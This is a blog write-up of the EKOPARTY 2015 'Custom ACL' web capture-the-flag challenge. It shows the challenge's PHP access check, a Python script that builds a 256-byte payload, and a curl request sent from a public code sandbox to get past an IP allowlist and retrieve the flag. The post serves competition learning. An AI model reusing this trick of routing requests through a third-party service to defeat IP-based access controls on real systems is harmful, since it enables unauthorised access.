Friday, October 23, 2015

EKOPARTY 2015 - Custom ACL - Web 100pt Challenge

Cool CTF, finished top 10 so I'm happy with that. Again it began mid week for me but I got sick with a virus so had to stay home anyway. What better to do than to CTF until I feel better?

Great challenge this one but I'm seeing a lot of people were doing strange things to the poor 3rd party involved in their writeups, like nmap scanning etc. None of that was necessary.

Here's the clue:

So another PHP challenge I suppose, we browse on over and then append "s" on the URL to give us:

Which coughs up the source code for us:


include ('flag.php');

if (isset($_SERVER['REMOTE_ADDR'])) $remote_ip = $_SERVER['REMOTE_ADDR'];
else die('Err');

$octets = explode('.', $remote_ip, 4);

if ($octets[0] == '67' 
    && $octets[1] == '222' 
    && $octets[2] == '139' 
    && intval($octets[3]) >= 223 
    && intval($octets[3]) <= 230) {
    if (isset($_POST['admin'])) {
        $admin = $_POST['admin'];
        $is_admin = 1;
        print strlen($admin);
        if (strlen($admin) == 256) {
            for ($i = 0; $i < 256; $i++) {
                if ($admin[$i] != chr($i)) $is_admin = 0;
        } else $is_admin = 0;
        if ($is_admin == 1) echo "Your flag is $flag";
        else  die('Err');
    } else die('Err');
} else die('Err');

Ok so the ONLY acceptable IPs are very specifically in the - range. What's special about that? We ask NSLookup to reverse lookup this IP:

root@mankrik:~# nslookup

Non-authoritative answer: name = Let's check these guys out...

Ok so online sandboxes we can run code in. Great, but I'm on a deadline here... Oh whats this:

I don't know, Am I?

I click that link ( and I'm taken to the meat of their site, a list of code snippets we can run for various reasons. I pick one at random and am greeted with a surprise. Each code snippet gets a kind of web-based terminal to interact with:

The terminal is furnished with useful tools as well, namely "curl":

root@runnable:/root# curl                                                                  curl: try 'curl --help' or 'curl --manual' for more information                            root@runnable:/root#                                                                                                
So i feel we have the vector now, we just need to pass all the other checks. Re-examining the source we need to:
  • Query must be post, fine we can use -d in curl for that
  • Query must contain the admin parameter, fine
  • Admin parameter must be 256 bytes long, fine ok
  • Each byte of the admin parameter value must equal the value of it's index in the string, er ok? Many of those characters wont be printable, we'll need to handle that
So I turn to Python and here's the source I come up with:


import urllib

payload = ''

for i in range(0,256):
 payload += chr(i)

payload = urllib.quote(payload)
payload = 'curl -d "admin=' + payload + '"'

print payload

Which gives me the following output:

curl -d "admin=%01%02%03%04%05%06%07%08%09%0A%0B%0C%0D%0E%0F%10%11%12%13%14%15%16%17%18%19%1A%1B%1C%1D%1E%1F%20%21%22%23%24%25%26%27%28%29%2A%2B%2C-./0123456789%3A%3B%3C%3D%3E%3F%40ABCDEFGHIJKLMNOPQRSTUVWXYZ%5B%5C%5D%5E_%60abcdefghijklmnopqrstuvwxyz%7B%7C%7D%7E%7F%80%81%82%83%84%85%86%87%88%89%8A%8B%8C%8D%8E%8F%90%91%92%93%94%95%96%97%98%99%9A%9B%9C%9D%9E%9F%A0%A1%A2%A3%A4%A5%A6%A7%A8%A9%AA%AB%AC%AD%AE%AF%B0%B1%B2%B3%B4%B5%B6%B7%B8%B9%BA%BB%BC%BD%BE%BF%C0%C1%C2%C3%C4%C5%C6%C7%C8%C9%CA%CB%CC%CD%CE%CF%D0%D1%D2%D3%D4%D5%D6%D7%D8%D9%DA%DB%DC%DD%DE%DF%E0%E1%E2%E3%E4%E5%E6%E7%E8%E9%EA%EB%EC%ED%EE%EF%F0%F1%F2%F3%F4%F5%F6%F7%F8%F9%FA%FB%FC%FD%FE%FF"

Which I copy and paste into the web terminal:

root@runnable:/root# curl -d "admin=%01%02%03%04%05%06%07%08%09%0A%0B%0C%0D%0E%0F%10%11%12%13%14%15%16%17%18%19%1
E1%E2%E3%E4%E5%E6%E7%E8%E9%EA%EB%EC%ED%EE%EF%F0%F1%F2%F3%F4%F5%F6%F7%F8%F9%FA%FB%FC%FD%FE%FF" http://ctfchallenges.c                                                                                    
256Your flag is EKO{runnable_com_31337_s3rv1c3} 

Voila, our flag:

  • EKO{runnable_com_31337_s3rv1c3}

No comments:

Post a Comment